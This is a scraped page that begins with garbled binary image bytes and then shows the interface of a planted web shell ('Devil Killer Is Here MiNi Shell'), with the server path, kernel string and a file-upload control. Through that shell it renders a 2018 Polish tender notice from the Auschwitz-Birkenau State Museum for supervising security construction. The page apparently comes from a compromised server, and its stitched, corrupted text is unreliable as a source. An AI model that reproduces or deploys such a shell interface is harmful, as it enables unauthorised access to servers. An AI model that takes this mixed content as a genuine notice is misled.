JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20180321/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20180321/534284-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 534284-N-2018 z dnia 2018-03-21 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Państwowe Muzeum Auschwitz-Birkenau w Oświęcimiu</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Pełnienie nadzoru inwestorskiego nad robotami budowlanymi realizowanymi przez odrębnych wykonawców robót pn.: zadanie nr 1 - Przebudowa części pomieszczeń w budynku B-1 oraz przebudowy instalacji elektrycznej oraz budowy zasilania awaryjnego w budynku A-50W; zadanie nr 2 - Montaż urządzeń budowlanych: krat, rolet, okiennic, drzwi wewnętrznych na terenie Auschwitz I oraz w budynku B-1 na terenie Auschwitz II; zadanie nr 3 - Rozbudowa kanalizacji kablowej, rozbudowa instalacji podziemnych w zakresie linii zasilających eNN, budowa słupów do montażu kamer - na terenie Auschwitz I oraz budowa kanalizacji kablowej, budowa linii zasilających eNN i instalacji oświetlenia, budowa słupów do montażu kamer na terenie Auschwitz II; zadanie nr 4 - Budowa ogrodzenia, na terenie Auschwitz II w ramach Projektu Bezpieczeństwa Miejsca Pamięci Auschwitz- Birkenau etap III</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Państwowe Muzeum Auschwitz-Birkenau w Oświęcimiu</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">27601500000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Więźniów Oświęcimia</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">20</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">32603 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Oświęcim</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">małopolskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">338 448 003</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">muzeum@auschwitz.org.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">33 843 18 62</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.auschwitz.org</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">Państwowa Instytucja Kultury</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">https://bip.malopolska.pl/auschwitz,m,302707,2018.html</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony">https://bip.malopolska.pl/auschwitz,m,302707,2018.html</span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">w formie pisemnej</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Państwowe Muzeum Auschwitz-Birkenau w Oświęcimiu, ul. Więźniów Oświęcimia 20, 32-603 Oświęcim, budynek administracyjny, dziennik podawczy (pokój nr 1.8)</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Pełnienie nadzoru inwestorskiego nad robotami budowlanymi realizowanymi przez odrębnych wykonawców robót pn.: zadanie nr 1 - Przebudowa części pomieszczeń w budynku B-1 oraz przebudowy instalacji elektrycznej oraz budowy zasilania awaryjnego w budynku A-50W; zadanie nr 2 - Montaż urządzeń budowlanych: krat, rolet, okiennic, drzwi wewnętrznych na terenie Auschwitz I oraz w budynku B-1 na terenie Auschwitz II; zadanie nr 3 - Rozbudowa kanalizacji kablowej, rozbudowa instalacji podziemnych w zakresie linii zasilających eNN, budowa słupów do montażu kamer - na terenie Auschwitz I oraz budowa kanalizacji kablowej, budowa linii zasilających eNN i instalacji oświetlenia, budowa słupów do montażu kamer na terenie Auschwitz II; zadanie nr 4 - Budowa ogrodzenia, na terenie Auschwitz II w ramach Projektu Bezpieczeństwa Miejsca Pamięci Auschwitz- Birkenau etap III</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny"></span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">2.1	Przedmiotem zamówienia jest pełnienie nadzoru inwestorskiego nad robotami budowlanymi wynikającymi z zadań realizowanych przez odrębnych wykonawców robót (pkt 2.1 należy czytać wraz z pkt 2.7 SIWZ):2.1.1	Zadanie nr 1 pt. ,,Przebudowa części pomieszczeń w budynku B-1 oraz przebudowy instalacji elektrycznej oraz budowy zasilania awaryjnego w budynku A-50W w ramach Projektu Bezpieczeństwa Miejsca Pamięci Auschwitz-Birkenau - Etap III", którego zakres wynika z postępowania przetargowego ogłoszonego przez Zamawiającego w 2018 r. pod numerem 2/511243-N-2018/INW/2018 (Załącznik nr 6 do SIWZ),2.1.2	Zadanie nr 2 pt. ,,Montaż urządzeń budowlanych: krat, rolet, okiennic, drzwi wewnętrznych na terenie Auschwitz I oraz w budynku B-1 na terenie Auschwitz II w ramach Projektu Bezpieczeństwa Miejsca Pamięci Auschwitz- Birkenau etap III", którego zakres wynika z postępowania przetargowego ogłoszonego przez Zamawiającego w 2018 r. pod numerem 4/518306-N-2018/INW/2018 (Załącznik nr 7 do SIWZ),2.1.3	Zadanie nr 3 pt.- ,,Rozbudowa kanalizacji kablowej, rozbudowa instalacji podziemnych w zakresie linii zasilających eNN, budowa słupów do montażu kamer - na terenie Auschwitz I oraz budowa kanalizacji kablowej, budowa linii zasilających eNN i instalacji oświetlenia, budowa słupów do montażu kamer na terenie Auschwitz II w ramach Projektu Bezpieczeństwa Miejsca Pamięci Auschwitz- Birkenau etap III", którego zakres wynika z postępowania przetargowego ogłoszonego przez Zamawiającego w 2018 r. pod numerem 3/511384-N-2018/INW/2018 (Załącznik nr 8 do SIWZ),2.1.4	Zadanie nr pt. - ,,Budowa ogrodzenia, na terenie Auschwitz II w ramach Projektu Bezpieczeństwa Miejsca Pamięci Auschwitz- Birkenau etap III", którego zakres wynika z postępowania przetargowego ogłoszonego przez Zamawiającego w 2017 r. pod numerem 42/631962-N-2017/INW/2017 (Załącznik nr 9 do SIWZ)2.2	Informacja o przewidywanych zamówieniach, o których mowa w art. 67 ust. 1 pkt 6 ustawy pzp (zamówienia na powtórzenie podobnych usług).Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 67 ust. 1 pkt 6 ustawy pzp w zakresie nadzoru inwestorskiego, w tych samych specjalnościach jak dla zamówienia podstawowego, nad wykonaniem robót budowlanych: 2.2.1	dodatkowego ogrodzenia wraz z bramą i infrastrukturą towarzyszącą na terenie Brzezinki na potrzeby Globalnego Planu Konserwacji Zamawiającego 2.2.2. Dodatkowego ogrodzenia na działce 239/7 w obrębie Brzezinka2.3 Usługa nadzoru inwestorskiego będzie wykonywana w specjalnościach:2.3.1	konstrukcyjno-budowlanej;2.3.2	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych;2.3.3	instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych; 2.3.4	instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych.2.4	Pełnienie nadzoru inwestorskiego w specjalnościach jak w pkt 2.3 SIWZ odbywać się będzie przez nadzorowanie prowadzonych robót budowlanych, o których mowa w pkt. 2.1 i pkt 2.7 SIWZ zgodnie z przepisami prawa budowlanego, odpowiednimi normami, projektami budowlanymi oraz wykonawczymi, specyfikacjami technicznymi wykonania i odbioru robót.2.5	Zamawiający ustala termin realizacji usługi od rozpoczęcia do zakończenia i odbioru przez Zamawiającego robót budowlanych określonych w pkt 2.1 i pkt 2.7 SIWZ. Wykonawca usługi nadzoru inspektorskiego będzie także zobowiązany do świadczenia tych usług w okresie rękojmi i gwarancji udzielonej dla robót budowlanych, o których mowa w pkt. 2.1 i pkt 2.7. SIWZ.2.6	Szacunkowy czas trwania Zadań wynosi:2.6.1	dla Zadania 1 określonego w Załączniku nr 5 - Istotne postanowienia umowy(wzór umowy) - w §1 ust. 1 pkt 1.1. - 18 tygodni od rozpoczęcia do zakończenia i odbioru robót budowlanych przez Zamawiającego z zastrzeżeniem wykonywania obowiązków określonych w § 4 ust. 6 Istotnych postanowień umowy (Załącznik nr 5) oraz okolicznością, że Inspektor Nadzoru będzie realizował obowiązki bez względu na faktyczne terminy odbiorów części lub odbioru końcowego Zadania; 2.6.2	dla Zadania 2 określonego w Załączniku nr 5 - Istotne postanowienia umowy(wzór umowy) - w §1 ust. 1 pkt 1.2. - 40 tygodni od rozpoczęcia do zakończenia i odbioru robót budowlanych przez Zamawiającego z zastrzeżeniem wykonywania obowiązków określonych w § 4 ust. 6 Istotnych postanowień umowy (Załącznik nr 5) oraz okolicznością, że Inspektor Nadzoru będzie realizował obowiązki bez względu na faktyczne terminy odbiorów części lub odbioru końcowego Zadania. 2.6.3	dla Zadania 3 określonego w Załączniku nr 5 - Istotne postanowienia umowy(wzór umowy) - w §1 ust. 1 pkt 1.3. - 40 tygodni od rozpoczęcia do zakończenia i odbioru robót budowlanych przez Zamawiającego z zastrzeżeniem wykonywania obowiązków określonych w § 4 ust. 6 Istotnych postanowień umowy (Załącznik nr 5) oraz okolicznością, że Inspektor Nadzoru będzie realizował obowiązki bez względu na faktyczne terminy odbiorów części lub odbioru końcowego Zadania. 2.6.4	dla Zadania 4 określonego w Załączniku nr 5 - Istotne postanowienia umowy(wzór umowy) - w §1 ust. 1 pkt 1.4. - 35 tygodni od rozpoczęcia do zakończenia i odbioru robót budowlanych przez Zamawiającego z zastrzeżeniem wykonywania obowiązków określonych w § 4 ust. 6 Umowy oraz okolicznością, że Inspektor Nadzoru będzie realizował obowiązki bez względu na faktyczne terminy odbioru częściowego lub odbioru końcowego każdego Zadania. 2.7	Opis robót budowlanych określonych w pkt 2.1 SIWZ jako Zadania o numerach od 1 do 4, nad którymi będzie pełniony nadzór inwestorski zawiera dokumentacja projektowa na którą składa się dokumentacja dostępna na stronie internetowej Zamawiającego w Biuletynie Informacji Publicznej:2.7.1	Dla Zadania 1 - dokumentacja projektowa opisana w załączniku 9 i 10 w ramach postępowania o numerze: 2/511243-N-2018/INW/2018, która jest przedstawiona w załączniku nr 6 do SIWZ; 2.7.2	Dla Zadania 2 - dokumentacja projektowa opisana w załączniku 9 i 10 w ramach postępowania o numerze: 4/518306-N-2018/INW/2018, która jest przedstawiona w załączniku nr 7 do SIWZ;2.7.3	Dla Zadania 3 - dokumentacja projektowa opisana w załączniku 9 i 10 w ramach postępowania o numerze: 3/511384-N-2018/INW/2018, która jest przedstawiona w załączniku nr 8 do SIWZ;2.7.4	Dla Zadania 4 - dokumentacja projektowa opisana w załączniku 9 i 10 w ramach postępowania o numerze: 42/631962-N-2017/INW/2017, która jest przedstawiona w załączniku nr 9 do SIWZ; Otwarcie dokumentacji projektowej jest możliwe wyłącznie za pomocą przekazanego przez Zamawiającego hasła. Podpisany wniosek o udostępnienie hasła należy przesłać w formie elektronicznej (skan) na adres: romana.kukurba@auschwitz.org lub w formie fax na nr 33/843 18 62.Krótki opis robót podano poniżej: 2.7.5	Zadanie nr 1 - pt: ,,Przebudowa części pomieszczeń w budynku B-1 oraz przebudowy instalacji elektrycznej oraz budowy zasilania awaryjnego w budynku A-50W w ramach Projektu Bezpieczeństwa Miejsca Pamięci Auschwitz-Birkenau - Etap III" tj.2.7.5.1	Według projektu budowlanego pn. ,,Przebudowa pomieszczeń na potrzeby Straży Muzealnej w budynku B-1" w lokalizacji Auschwitz II- Brzezinka tj.a.	Przebudowa pomieszczeń Straży Muzealnej, tj. pomieszczenia 2.1, 2.1a, 2.2, 2.3, 2.4 (Numeracja wg. projektu architektury) oraz poddasza wraz z budową przynależnych instalacji wewnętrznych w budynku B-1 oraz wszelkich robót niezbędnych do instalacji i uruchomienia lokalnego centrum nadzoru zgodnie z dokumentacja i przynależnymi projektami wykonawczymi.b.	Malowanie pomieszczeń 2.1, 2.1a, 2.2, 2.3, 2.4 (Numeracja wg. projektu architektury)c.	Wymiana wykładziny podłogowej w pomieszczeniu 2.2.d.	Instalacja i uruchomienie generatora oraz UPS z akumulatorami zasilania awaryjnego w pomieszczeniu nr 3.16 wraz z niezbędnymi pracami instalacyjnymi i budowlanymi. e.	Poza zakresem zamówienia pozostaje:- Przeniesienie rozdzielnicy z pomieszczenia 3.10 do pomieszczenia 3.16;- Dostawa i montaż drzwi antywłamaniowych D1 i D2 w pomieszczeniu 2.1a oraz 3 sztuk rolet antywłamaniowych w pomieszczeniu 2.2.- Przebudowy pomieszczeń 3.20, 3.11, 3.2, 3.9.f.	Roboty według projektu budowlanego pn. ,, Montaż urządzeń budowlanych: krat, rolet, okiennic, drzwi wewnętrznych" w obiekcie Auschwitz I- Oświęcim:g.	Przebudowa instalacji elektrycznej w budynku A-50W, wskazanej w tej dokumentacji w branży elektrycznej i przynależnym projekcie wykonawczym. h.	Instalację i uruchomienie generatora oraz UPS z akumulatorami zasilania awaryjnego wraz z niezbędnymi pracami instalacyjnymi i budowlanymi.i.	Poza zakresem zamówienia pozostaje wyprowadzenie okablowania z budynku do zasilania urządzeń bezpieczeństwa w terenie oraz zasilania bramy nr 1.2.7.6	Zadanie nr 2 - pt: ,,Montaż urządzeń budowlanych: krat, rolet, okiennic, drzwi wewnętrznych na terenie Auschwitz I oraz w budynku B-1 na terenie Auschwitz II w ramach Projektu Bezpieczeństwa Miejsca Pamięci Auschwitz- Birkenau etap III" tj.2.7.6.1	Według projektu budowlanego pn. ,,Montaż urządzeń budowlanych: krat, rolet, okiennic, drzwi wewnętrznych" w lokalizacji Auschwitz I- Oświęcim (A9, A10, A14, A18, A-25, A26, A44, A46, A50) tj. budowa wszystkich zabezpieczeń budowlano- mechanicznych wskazanych w tej dokumentacji w branży architektonicznej i przynależnych projektach wykonawczych wraz z instalacją zasilającą roletę w budynku A50;2.7.6.2	Według projektu budowlanego pn. ,,Przebudowa pomieszczeń na potrzeby Straży Muzealnej w budynku B-1" w lokalizacji Auschwitz II- Brzezinka tj. montaż rolet w pomieszczeniu 2.2 oraz montaż drzwi w pomieszczeniu 2.1a (numeracja wg. projektu 